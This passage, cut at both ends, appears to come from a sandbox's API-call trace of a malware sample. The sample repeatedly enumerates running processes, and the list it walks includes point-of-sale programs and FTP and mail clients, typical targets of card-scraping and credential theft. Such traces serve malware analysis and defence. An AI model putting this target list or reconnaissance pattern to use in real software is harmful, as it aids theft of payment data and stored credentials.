th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0234.124] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0234.125] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0234.127] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0234.129] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0234.131] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0234.132] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0234.134] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0234.135] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0234.138] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0234.140] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0234.142] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.143] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.145] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.146] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.148] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.149] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0234.151] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0234.320] CloseHandle (hObject=0x1494) returned 1 [0234.322] Sleep (dwMilliseconds=0x64) [0234.547] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0234.561] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.565] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.567] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.571] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.576] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.578] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.580] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.581] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.585] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.587] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.589] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.674] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.678] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.680] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.681] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.683] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0234.686] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0234.689] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.691] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.692] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0234.694] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0234.696] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0234.698] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.700] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.702] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0234.704] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.706] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.708] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0234.709] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0234.711] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0234.713] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0234.817] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0234.820] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0234.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0234.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0234.828] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0234.830] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0234.831] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0234.833] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0234.835] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0234.837] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0234.839] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0234.850] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0234.852] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0234.854] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0234.856] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0234.859] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0234.861] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0234.863] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0234.865] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0234.867] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0234.868] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0234.870] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0234.929] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0234.931] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0234.933] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0234.938] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0234.940] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0234.942] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0234.944] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0234.945] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 